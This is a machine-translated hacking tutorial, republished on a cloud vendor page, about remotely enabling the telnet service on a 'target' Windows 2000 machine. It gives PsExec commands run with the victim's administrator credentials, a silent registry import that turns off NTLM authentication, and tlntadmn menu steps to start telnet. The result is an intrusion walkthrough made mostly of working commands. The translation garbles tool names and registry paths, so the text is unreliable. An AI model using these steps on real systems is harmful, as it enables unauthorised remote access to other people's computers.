Home > Cloud Computing > Cloud Security

Quickly enable the telnet service for the other machine (win2000)

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

Introduction: a day, a day, a time, a location, a person, a machine ,...
Tool: Export xec.exe
Tester: littleshrimphttp: // www.chinansl.com
Condition: the Administrator account and password of the Peer machine can be set to any one, and the telnet service of the Peer machine can be enabled using the psexec.exe tool. Practice passed.

Currently, there are two popular online telnet service tutorials on the target machine:
1. A ntlm.exe runas.exe ...... I think it is very complicated :(
I didn't underestimate the meaning of Xiao Rong: ") I think Xiao Rong can write a program to modify the registry. It's not easy :")
II. A tutorial written by. abu. to quickly enable the telnet service on the target machine. Said it was fast, in fact not fast :(
You need to operate the registry of the target machine, which is extremely slow. There is no XX meaning :"(
3. I wrote a tutorial to enable the telnet service on the other machine ~~ Not popular, --- reference: Faster, haha ~ I Don't boast of it. I need two tools: Export xec.exe‑ntlm.exe. Method omitted: ") Do you want to use it better :")
Haha ~~ I made some comments on the above tutorial on enabling the telnet service. My personal opinions are for your reference only.
Today I am talking about how to quickly enable the telnet service on the opposite machine (win 2000). You just need a tool.
PSEXEC. EXE
Here is an introduction:
C: ToolsPstools> export xec.exe

Export xec v1.3-execute processes remotely
Copyright (C) 2001 Mark Russinovich
Www.sysinternals.com

Export xec executes a program on a remote system, where remotely executed console
Applications execute interactively.

Usage: Invalid xec \ computer [-u user [-p psswd] [-s] [-I] [-c [-f] [-d] cmd [argument
S]
-U Specifies optional user name for login to remote
Computer.
-P Specifies optional password for user name. If you omit this
You will be prompted to enter a hidden password.
-S Run the remote process in the System account.
-I Run the program so that it interacts with the desktop on
Remote system.
-C Copy the specified program to the remote system
Execution. If you omit this option the application
Must be in the system path on the remote system.
-F Copy the specified program even if the file already
Exists on the remote system.
-D Dont wait for process to terminate (non-interactive ).
Program Name of application to execute.
Arguments Arguments to pass (note that file paths must be
Absolute paths on the target system ).

You can enclose applications that have spaces in their name
Quotation marks e.g. Export xec \ marklap "c: long name app.exe ".
Input is only passed to the remote system when you press the enter
Key, and typing Ctrl-C terminates the remote process.

If you omit a user name the process will run in the context of your
Account on the remote system, but will not have access to network
Resources (because it is impersonating). Specify a valid user name
In the DomainUser syntax if the remote process requires access
To network resources or to run in a different account. Note that
The password is transmitted in clear text to the remote system.
C: ToolsPstools>
What do you know about English ?? Haha ~ Keep exploring for yourself !!
Here we use the two parameters-u-p of this command line to introduce:-u is the account of the administrator of the opposite machine-p is the password of the Administrator account of the other party, if the password is null, the-p option is not available.
Running format: psexec.exe \ ip address of the other machine-u Administrator Account of the other machine-p Administrator account and password of the other machine cmd (programs to be run)
In the following command line:
1. Export xec.exe \ ip-u administrator-p foolishman cmd
2. log on to the target machine and run tlntadmn.exe under c: winntsystem32> ~~ What program is this ?? Telnet Server Management! Haha ~~ OK ??
3. Now, you know how to enjoy it :)
4. EOF
Method 2:
Another method is to write a reg file and change the ntlm value to 0 or 1.
Under dos
C:> copy con reg. reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftTelnetServer1.0]
"NTLM" = dword: 00000000
^ Z
C:> regedit/s reg. reg does not show a confirmation window :")
C:> net start telnet
OK
Enable the peer telnet Service: ") is it very concise :")
Step 1:
Local running:
D: hack> tlntadmn


Microsoft (R) Windows 2000 (TM) (internal version 2195)
Telnet Server Admin (Build 5.00.99201.1)

Select one of the following options:


0) Exit the application.
1) list the current user
2) end a user's session...
3) display/change registry settings...
4) Start Service
5) stop the service

Enter an option number [0-5] to select this option: 3


Select one of the following options:

0) Exit the menu.
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) defashell Shell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
Enter an option number [0-8] to select this option: 7
Current NTLM value = 1
Do you want to change this value? [Y/n] y
NTLM [current value = 1; acceptable value 0, 1 or 2]: 0
You do want to set NTLM to: 0? [Y/n] y

The setting takes effect only when the Telnet service is restarted.


Select one of the following options:

0) Exit the menu.
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) defashell Shell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
Enter the number of an option [0-8] to select this option: 0

Select one of the following options:


0) Exit the application.
1) list the current user
2) end a user's session...
3) display/change registry settings...
4) Start Service
5) stop the service

Enter an option number [0-5] to select this option: 4
Start Microsoft Telnet service...
Microsoft Telnet service started successfully

Select one of the following options:


0) Exit the application.
1) list the current user
2) end a user's session...
3) display/change registry settings...
4) Start Service
5) stop the service

Enter the number of an option [0-5] to select this option: 0

######################################## #######################################
Run the following command on the target machine:
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C: WINNTsystem32> tlntadmn => press Enter! Run the telnet manager, but the menu is not displayed :(
3 <= Press ENTER
------------------------
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) defashell Shell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
------------------------ The menu that appears ~~
7 <= Press ENTER
Y <= press Enter.
NTLM0 <= type (0) NTLM is not the input carriage return
Y <= press Enter.
---------------------
1) AllowTrustedDomain
2) AltKeyMapping
3) DefaultDomain
4) defashell Shell
5) LoginScript
6) MaxFailedLogins
7) NTLM
8) TelnetPort
--------------------- The menu appears after NTLM is modified.
0 <= press enter to exit the menu.
4 <= press enter to open the telnet service <=> net start telnet
0 <= press enter to exit the telnet manager.

C: WINNTsystem32> OK. the telnet service of the target machine is enabled.

 

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
wordpress the field enable telnet windows xp enable telnet linux windows enable telnet enable telnet command enable advanced dns service how to enable telnet in windows xp
Related Article
Focus on three major cloud security areas, you know?
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More